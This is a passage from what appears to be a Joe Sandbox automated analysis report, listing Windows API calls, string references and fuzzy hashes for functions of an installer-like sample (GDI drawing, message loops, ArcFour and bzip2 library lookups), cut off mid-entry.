                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Object$BitmapBitsDelete$CreateIcon
                                          • String ID:
                                          • API String ID: 1030595962-0
                                          • Opcode ID: 21ac1b7a451ae89d67a64f248cb283bf6ff7d59a21f2225fedb955a524ed5c7e
                                          • Instruction ID: d63a52ddb0c8291f5c637ced4972fc4f1cb22fce5bbc263bf6f2b973d959c792
                                          • Opcode Fuzzy Hash: 21ac1b7a451ae89d67a64f248cb283bf6ff7d59a21f2225fedb955a524ed5c7e
                                          • Instruction Fuzzy Hash: 6E511675A00219AFCB10DFE9C8819DEB7F9EF48314B11856AF914E7391D738AD82CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CFC6
                                          • 72E5AD70.GDI32(00000000,00000026), ref: 0041CFE5
                                          • 72E5B410.GDI32(?,?,00000001,00000000,00000026), ref: 0041D04B
                                          • 72E5B150.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041D05A
                                          • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D0C4
                                          • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D102
                                          • 72E5B410.GDI32(?,?,00000001,0041D134,00000000,00000026), ref: 0041D127
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Stretch$B410$B150BitsMode
                                          • String ID:
                                          • API String ID: 1142175050-0
                                          • Opcode ID: 1aa12a6cbd08d8255b6eb8068d6bae64d2c5071c0f10fac204963572875c048a
                                          • Instruction ID: 205027aeaf3ec0e52080f5777dc3b0bf9e1b7b1a1eecc77d6eedf305108e6316
                                          • Opcode Fuzzy Hash: 1aa12a6cbd08d8255b6eb8068d6bae64d2c5071c0f10fac204963572875c048a
                                          • Instruction Fuzzy Hash: 4B514CB0A00204BFDB14DFA9C995F9BBBE8EF08304F108599B544D7292C779ED81CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageA.USER32(00000000,?,?), ref: 004552AE
                                            • Part of subcall function 00424344: GetWindowTextA.USER32 ref: 00424364
                                            • Part of subcall function 0041EF6C: GetCurrentThreadId.KERNEL32 ref: 0041EFBB
                                            • Part of subcall function 0041EF6C: 72E5AC10.USER32(00000000,0041EF1C,00000000,00000000,0041EFD8,?,00000000,0041F00F,?,00000000,00000000,021E2410), ref: 0041EFC1
                                            • Part of subcall function 0042438C: SetWindowTextA.USER32(?,00000000), ref: 004243A4
                                          • GetMessageA.USER32 ref: 00455315
                                          • TranslateMessage.USER32(?), ref: 00455333
                                          • DispatchMessageA.USER32 ref: 0045533C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Message$TextWindow$CurrentDispatchSendThreadTranslate
                                          • String ID: [Paused]
                                          • API String ID: 3744435275-4230553315
                                          • Opcode ID: 30f2530590a24191f7504455738b6e68ed9f6331a58c559f63864f9203593cc7
                                          • Instruction ID: d4d559e98c01fd19c9158a949e1c4478d2f8558c4a66ba59e997b8cb75d2eadd
                                          • Opcode Fuzzy Hash: 30f2530590a24191f7504455738b6e68ed9f6331a58c559f63864f9203593cc7
                                          • Instruction Fuzzy Hash: 7031D330904648AECB01DBB5DC51BAEBBB8EB09314F50447BEC04E3292D7789909CB29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCursor.USER32(00000000,004648D3), ref: 00464850
                                          • LoadCursorA.USER32 ref: 0046485E
                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,004648D3), ref: 00464864
                                          • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,004648D3), ref: 0046486E
                                          • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,004648D3), ref: 00464874
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Cursor$LoadSleep
                                          • String ID: CheckPassword
                                          • API String ID: 4023313301-1302249611
                                          • Opcode ID: 18e40c631363f873b59ed07b8397dca0b357b36b41a77fd912bff81ad102a300
                                          • Instruction ID: eac744777a8890470a5a55a98f652c6345ef9197b5cde8571231044706295a57
                                          • Opcode Fuzzy Hash: 18e40c631363f873b59ed07b8397dca0b357b36b41a77fd912bff81ad102a300
                                          • Instruction Fuzzy Hash: FD318634644244AFE700EB69C88AB9D7BE5AF45304F5580B6B8049B3E2D778AE40CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041C110: GetObjectA.GDI32(?,00000018), ref: 0041C11D
                                          • GetFocus.USER32 ref: 0041C230
                                          • 72E5AC50.USER32(?), ref: 0041C23C
                                          • 72E5B410.GDI32(?,?,00000000,00000000,0041C2BB,?,?), ref: 0041C25D
                                          • 72E5B150.GDI32(?,?,?,00000000,00000000,0041C2BB,?,?), ref: 0041C269
                                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C280
                                          • 72E5B410.GDI32(?,00000000,00000000,0041C2C2,?,?), ref: 0041C2A8
                                          • 72E5B380.USER32(?,?,0041C2C2,?,?), ref: 0041C2B5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: B410$B150B380BitsFocusObject
                                          • String ID:
                                          • API String ID: 514114485-0
                                          • Opcode ID: eff73aa052735073d2a1768d693beb2cfd617a757480bb56e518bfc57315f513
                                          • Instruction ID: c2976d6cd85da84569e921dd34d174535c44734310ef376fe1b2036df50ccd9e
                                          • Opcode Fuzzy Hash: eff73aa052735073d2a1768d693beb2cfd617a757480bb56e518bfc57315f513
                                          • Instruction Fuzzy Hash: 65111A71A40604BBDB10EBE9CC85FAFB7FCEB48700F15486AB518E7281D67899408B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemMetrics.USER32 ref: 00418D38
                                          • GetSystemMetrics.USER32 ref: 00418D40
                                          • 6F7A7CB0.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,?), ref: 00418D46
                                            • Part of subcall function 00409A8C: 6F7A0620.COMCTL32(?,000000FF,00000000,00418D74,00000000,00418DD0,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,?), ref: 00409A90
                                          • 6F7FBC60.COMCTL32(?,00000000,00000000,00000000,00000000,00418DD0,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,?), ref: 00418D96
                                          • 6F7FB6C0.COMCTL32(00000000,?,?,00000000,00000000,00000000,00000000,00418DD0,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418DA1
                                          • 6F7FBC60.COMCTL32(?,00000001,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00418DD0,?,00000000,0000000D,00000000), ref: 00418DB4
                                          • 6F7A7D50.COMCTL32(?,00418DD7,?,00000000,?,?,00000000,00000000,00000000,00000000,00418DD0,?,00000000,0000000D,00000000,0000000E), ref: 00418DCA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: MetricsSystem$A0620
                                          • String ID:
                                          • API String ID: 3249894280-0
                                          • Opcode ID: f155504e81d06e82f2dd16528ef757ae6e0c395946e4153f22485fb8567b04d7
                                          • Instruction ID: 83ea1bba3dd754c4722f5a4351d59464f51687baf460525fc32cad82f283ec05
                                          • Opcode Fuzzy Hash: f155504e81d06e82f2dd16528ef757ae6e0c395946e4153f22485fb8567b04d7
                                          • Instruction Fuzzy Hash: 50118971B40244BBDB10EBA5DC83F5E73F8DB48704F5145AAB604FB2C2D5799D408B18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 72E5AC50.USER32(00000000,?,?,00000000), ref: 00488255
                                            • Part of subcall function 0041A2B0: CreateFontIndirectA.GDI32(?), ref: 0041A36F
                                          • SelectObject.GDI32(00000000,00000000), ref: 00488277
                                          • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,004886A5), ref: 0048828B
                                          • GetTextMetricsA.GDI32(00000000,?), ref: 004882AD
                                          • 72E5B380.USER32(00000000,00000000,004882D7,004882D0,?,00000000,?,?,00000000), ref: 004882CA
                                          Strings
                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00488282
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Text$B380CreateExtentFontIndirectMetricsObjectPointSelect
                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                          • API String ID: 3658053993-222967699
                                          • Opcode ID: e336c1ffe02ed2120a47a33971289be9318d51e85d146f97ddea82a5d36c50fb
                                          • Instruction ID: c86eba72dc87e027b10ab16d58a2fbe8e9f8e1ec00f713e495128ac661362904
                                          • Opcode Fuzzy Hash: e336c1ffe02ed2120a47a33971289be9318d51e85d146f97ddea82a5d36c50fb
                                          • Instruction Fuzzy Hash: 60016176A04608AFDB04EBE5CC41E5FB7ECDB48714F5104BAB604E72C1DA78AE108B28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SelectObject.GDI32(00000000,?), ref: 0041B538
                                          • SelectObject.GDI32(?,00000000), ref: 0041B547
                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B573
                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B581
                                          • SelectObject.GDI32(?,00000000), ref: 0041B58F
                                          • DeleteDC.GDI32(00000000), ref: 0041B598
                                          • DeleteDC.GDI32(?), ref: 0041B5A1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$Delete$Stretch
                                          • String ID:
                                          • API String ID: 1458357782-0
                                          • Opcode ID: 515d24f70a0cf549d0b2e059984d3bdd84f91c0b7063a8e7fed934d78969567d
                                          • Instruction ID: aadd17d00576477065a1616842709b51dddc5215e8da7aa7bf7294541355b014
                                          • Opcode Fuzzy Hash: 515d24f70a0cf549d0b2e059984d3bdd84f91c0b7063a8e7fed934d78969567d
                                          • Instruction Fuzzy Hash: FE117872E00619ABDF50DBD9E885FAFB3FCEB08304F004515B614EB281C6789D418BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCursorPos.USER32 ref: 00423477
                                          • WindowFromPoint.USER32(?,?), ref: 00423484
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00423492
                                          • GetCurrentThreadId.KERNEL32 ref: 00423499
                                          • SendMessageA.USER32(00000000,00000084,?,?), ref: 004234B2
                                          • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 004234C9
                                          • SetCursor.USER32(00000000), ref: 004234DB
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                          • String ID:
                                          • API String ID: 1770779139-0
                                          • Opcode ID: 81f00774b20a2a229e9ca12694f3ea788b77e9e61f70631baffb1ab651dbb8be
                                          • Instruction ID: 430ad60131859f11e65866b08c3df0807d4cd3ad5463abd474490cb6163e9c12
                                          • Opcode Fuzzy Hash: 81f00774b20a2a229e9ca12694f3ea788b77e9e61f70631baffb1ab651dbb8be
                                          • Instruction Fuzzy Hash: F001D43230421036D6217B765C82E6F22E8CB84B59F51417FB905AB282D93EAC10A3AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 00488078
                                          • 6CAD5550.KERNEL32(00000000,MonitorFromRect,user32.dll), ref: 00488085
                                          • 6CAD5550.KERNEL32(00000000,GetMonitorInfoA,00000000,MonitorFromRect,user32.dll), ref: 00488092
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550$HandleModule
                                          • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                          • API String ID: 973534670-2254406584
                                          • Opcode ID: 7db87c9fda0348b87a1a41c77383b14b85d3047ca445bb9fc7c36df8c17157e0
                                          • Instruction ID: 6e562e19ac84550870092a3c1b8ba6b0c0ac266d8b29f396ed82e57d191843af
                                          • Opcode Fuzzy Hash: 7db87c9fda0348b87a1a41c77383b14b85d3047ca445bb9fc7c36df8c17157e0
                                          • Instruction Fuzzy Hash: 77F09652B42A1527D23035690C81A7F228DCB967A4F96093FBE10B7282ED5D9C0847AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD5550.KERNEL32(10000000,ISCryptGetVersion,?,004746B3,00000000,004746DC), ref: 00459CA1
                                          • 6CAD5550.KERNEL32(10000000,ArcFourInit,10000000,ISCryptGetVersion,?,004746B3,00000000,004746DC), ref: 00459CB1
                                          • 6CAD5550.KERNEL32(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,004746B3,00000000,004746DC), ref: 00459CC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550
                                          • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                          • API String ID: 183293030-508647305
                                          • Opcode ID: acb488890e5c2e2b379f4dcc6f739c5c26938aec1786831ae11f0791edab86da
                                          • Instruction ID: 55b88a5c9a895eb77ebb854db0f92e8eb359b5923d934d189e0fc1b8f0dc63c2
                                          • Opcode Fuzzy Hash: acb488890e5c2e2b379f4dcc6f739c5c26938aec1786831ae11f0791edab86da
                                          • Instruction Fuzzy Hash: 32F0F4B1A11A108FE728DF66AC8576B3BA5E785306B04847BF807916A2DB780848DE0C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD5550.KERNEL32(00000000,BZ2_bzDecompressInit,?,0047454C,00000000,00474575), ref: 0045A1A1
                                          • 6CAD5550.KERNEL32(00000000,BZ2_bzDecompress,00000000,BZ2_bzDecompressInit,?,0047454C,00000000,00474575), ref: 0045A1B1
                                          • 6CAD5550.KERNEL32(00000000,BZ2_bzDecompressEnd,00000000,BZ2_bzDecompress,00000000,BZ2_bzDecompressInit,?,0047454C,00000000,00474575), ref: 0045A1C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550
                                          • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                          • API String ID: 183293030-212574377
                                          • Opcode ID: 9f2a9bcdc621ac13df638437ea11ddaa6b8964c00a90bc92546b47afa8f0b326
                                          • Instruction ID: 94854f8a5b0d0740457f58f45d8c078d7974d2f116e12e67d2e521bd6c5c8b3f
                                          • Opcode Fuzzy Hash: 9f2a9bcdc621ac13df638437ea11ddaa6b8964c00a90bc92546b47afa8f0b326
                                          • Instruction Fuzzy Hash: D3F030B0E00A809ED704DF22AC857673F95A74A30AF20863BB80756AA2D77D0458CF1E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(oleacc.dll,?,0044ED2D), ref: 0044C47F
                                          • 6CAD5550.KERNEL32(00000000,LresultFromObject,oleacc.dll,?,0044ED2D), ref: 0044C490
                                          • 6CAD5550.KERNEL32(00000000,CreateStdAccessibleObject,00000000,LresultFromObject,oleacc.dll,?,0044ED2D), ref: 0044C4A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550$LibraryLoad
                                          • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                          • API String ID: 4129453343-1050967733
                                          • Opcode ID: d3c614515ba41650864abbc004c9112c3029005685b8966e8ed844b311a5e133
                                          • Instruction ID: af5fafed751ad919ba175a44a32b7430eff449043fbbe5ec937408c8bd9dc759
                                          • Opcode Fuzzy Hash: d3c614515ba41650864abbc004c9112c3029005685b8966e8ed844b311a5e133
                                          • Instruction Fuzzy Hash: 6EF01270A437519BF7606F61DED976A37A4E30031DF15593EA001961E1D7BC5444CF0D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,0048B7A2), ref: 0044F423
                                          • 6CAD5550.KERNEL32(00000000,user32.dll,NotifyWinEvent,0048B7A2), ref: 0044F429
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550HandleModule
                                          • String ID: NotifyWinEvent$\ C$`,v$user32.dll
                                          • API String ID: 920177481-561449860
                                          • Opcode ID: f23abb250f5d8cbd57fbc1a3597fd41e5b5c4fbf6de949d5700e8edf7e678f20
                                          • Instruction ID: a562bb83bf1e91672e59b0269b5ac662ec6ff40591448e8de7f393a80c299ec4
                                          • Opcode Fuzzy Hash: f23abb250f5d8cbd57fbc1a3597fd41e5b5c4fbf6de949d5700e8edf7e678f20
                                          • Instruction Fuzzy Hash: 38E0B6B0E027545AE601BFA69842B0E3BA0D75531CF20493FA900662A3CB7C44498F2E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFocus.USER32 ref: 0041B646
                                          • 72E5AC50.USER32(?,00000000,0041B720,?,?,?,?), ref: 0041B652
                                          • 72E5AD70.GDI32(?,00000068,00000000,0041B6F4,?,?,00000000,0041B720,?,?,?,?), ref: 0041B66E
                                          • 72E5AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B6F4,?,?,00000000,0041B720,?,?,?,?), ref: 0041B68B
                                          • 72E5AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B6F4,?,?,00000000,0041B720), ref: 0041B6A2
                                          • 72E5B380.USER32(?,?,0041B6FB,?,?), ref: 0041B6EE
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: B380Focus
                                          • String ID:
                                          • API String ID: 3891926489-0
                                          • Opcode ID: 96cd0f549e70ce9be7b9710d4241d4da25a4f0c7083478d0b07e25f6b7abca35
                                          • Instruction ID: 11df3400f1eb03de84113c5c3ec4ebf7f10d2645e46e8c7fa1f075b946e55609
                                          • Opcode Fuzzy Hash: 96cd0f549e70ce9be7b9710d4241d4da25a4f0c7083478d0b07e25f6b7abca35
                                          • Instruction Fuzzy Hash: 3F41C831A001589FCF10DFA9C885AAFBBB4EF59704F1584AAF940EB351D7389D11CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042C81C: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C840
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,0048DF30,00000FFF,00000000,00456B5B,?,?,00000000,0048D628), ref: 00456A9C
